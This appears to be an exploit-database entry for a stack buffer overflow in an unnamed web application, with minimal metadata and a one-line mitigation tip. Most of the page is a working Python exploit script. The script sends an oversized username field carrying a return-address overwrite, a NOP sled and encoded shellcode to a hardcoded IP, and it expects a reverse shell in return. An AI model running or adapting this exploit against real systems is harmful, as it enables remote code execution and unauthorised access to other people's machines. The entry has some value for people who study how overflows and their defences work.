Stack Buffer Overflow Exploit

vendor:

N/A

by:

Anonymous

7,5

CVSS

HIGH

Stack Buffer Overflow

120

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2020

Stack Buffer Overflow Exploit

This exploit is a stack buffer overflow exploit which is used to gain access to a system by sending malicious code to a vulnerable application. The malicious code is sent as an input buffer which is then executed by the vulnerable application. The malicious code is sent as part of an HTTP POST request to the vulnerable application. The malicious code contains shellcode which is then executed by the vulnerable application.

Mitigation:

The best way to mitigate stack buffer overflow vulnerabilities is to use secure coding practices such as input validation, boundary checks, and proper memory management.

Source

Exploit-DB raw data:

#!/usr/bin/python
import socket

try:
	print "\nSending evil buffer..."
 
	shellcode = ("\xba\x31\x13\x39\xe4\xdb\xd3\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
	"\x52\x31\x56\x12\x03\x56\x12\x83\xdf\xef\xdb\x11\xe3\xf8\x9e"
	"\xda\x1b\xf9\xfe\x53\xfe\xc8\x3e\x07\x8b\x7b\x8f\x43\xd9\x77"
	"\x64\x01\xc9\x0c\x08\x8e\xfe\xa5\xa7\xe8\x31\x35\x9b\xc9\x50"
	"\xb5\xe6\x1d\xb2\x84\x28\x50\xb3\xc1\x55\x99\xe1\x9a\x12\x0c"
	"\x15\xae\x6f\x8d\x9e\xfc\x7e\x95\x43\xb4\x81\xb4\xd2\xce\xdb"
	"\x16\xd5\x03\x50\x1f\xcd\x40\x5d\xe9\x66\xb2\x29\xe8\xae\x8a"
	"\xd2\x47\x8f\x22\x21\x99\xc8\x85\xda\xec\x20\xf6\x67\xf7\xf7"
	"\x84\xb3\x72\xe3\x2f\x37\x24\xcf\xce\x94\xb3\x84\xdd\x51\xb7"
	"\xc2\xc1\x64\x14\x79\xfd\xed\x9b\xad\x77\xb5\xbf\x69\xd3\x6d"
	"\xa1\x28\xb9\xc0\xde\x2a\x62\xbc\x7a\x21\x8f\xa9\xf6\x68\xd8"
	"\x1e\x3b\x92\x18\x09\x4c\xe1\x2a\x96\xe6\x6d\x07\x5f\x21\x6a"
	"\x68\x4a\x95\xe4\x97\x75\xe6\x2d\x5c\x21\xb6\x45\x75\x4a\x5d"
	"\x95\x7a\x9f\xf2\xc5\xd4\x70\xb3\xb5\x94\x20\x5b\xdf\x1a\x1e"
	"\x7b\xe0\xf0\x37\x16\x1b\x93\xf7\x4f\x93\xde\x90\x8d\xd3\x21"
	"\xda\x1b\x35\x4b\x0c\x4a\xee\xe4\xb5\xd7\x64\x94\x3a\xc2\x01"
	"\x96\xb1\xe1\xf6\x59\x32\x8f\xe4\x0e\xb2\xda\x56\x98\xcd\xf0"
	"\xfe\x46\x5f\x9f\xfe\x01\x7c\x08\xa9\x46\xb2\x41\x3f\x7b\xed"
	"\xfb\x5d\x86\x6b\xc3\xe5\x5d\x48\xca\xe4\x10\xf4\xe8\xf6\xec"
	"\xf5\xb4\xa2\xa0\xa3\x62\x1c\x07\x1a\xc5\xf6\xd1\xf1\x8f\x9e"
	"\xa4\x39\x10\xd8\xa8\x17\xe6\x04\x18\xce\xbf\x3b\x95\x86\x37"
	"\x44\xcb\x36\xb7\x9f\x4f\x56\x5a\x35\xba\xff\xc3\xdc\x07\x62"
	"\xf4\x0b\x4b\x9b\x77\xb9\x34\x58\x67\xc8\x31\x24\x2f\x21\x48"
	"\x35\xda\x45\xff\x36\xcf")

	inputBuffer = "A" * 780 + "\x83\x0c\x09\x10" + "C" * 4 + "\x90" * 10 + shellcode
	content="username="+inputBuffer+"&password=A"
	 
	buffer="POST /login HTTP/1.1\r\n"
	buffer+="Host: 192.168.176.139\r\n"
	buffer+="User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
	buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
	buffer+="Accept-Language: en-US,en;q=0.5\r\n"
	buffer+="Referer: http://192.168.176.139/login\r\n"
	buffer+="Connection: close\r\n"
	buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
	buffer+="Content-Length: "+str(len(content))+"\r\n"
	buffer+="\r\n"
	buffer+=content
	 
	s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
	s.connect(("192.168.176.139", 80))
	s.send(buffer)
	s.close()
	print "\nDone did you get a reverse shell?"
except: 
	print "\nCould not connect!"